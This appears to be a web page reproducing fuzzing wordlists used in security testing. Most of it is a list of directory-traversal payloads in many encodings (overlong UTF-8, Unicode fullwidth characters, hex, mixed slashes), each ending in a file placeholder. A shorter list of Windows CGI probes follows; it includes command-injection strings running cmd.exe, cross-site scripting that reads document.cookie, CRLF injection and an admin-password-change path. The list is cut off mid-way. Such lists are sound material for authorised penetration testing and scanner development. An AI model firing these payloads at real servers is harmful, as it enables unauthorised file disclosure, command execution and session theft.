%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}<br />
..%u2216{FILE}<br />
..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}<br />
..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}<br />
..%uF025{FILE}<br />
..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}<br />
%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}<br />
%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}<br />
..0x2f{FILE}<br />
..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
..0x5c{FILE}<br />
..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
